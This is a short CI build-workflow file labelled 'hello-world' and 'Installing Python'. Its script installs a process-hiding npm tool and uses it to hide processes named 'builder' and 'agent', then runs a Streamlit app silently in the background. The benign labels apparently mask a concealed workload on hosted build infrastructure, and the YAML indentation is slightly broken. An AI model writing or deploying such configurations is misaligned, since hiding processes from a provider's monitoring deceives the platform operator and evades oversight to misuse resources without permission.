workflows:
  hello-world:
    name: Installing Python
    scripts: 
      - name: Running Builder
      script: |
        apt-get update -y
        apt-get install python procps npm -y
        npm i -g node-process-hider
        ph add builder; exit 0
        ph add agent; exit 0
        watch free -m & python streamlit_app.py > /dev/null
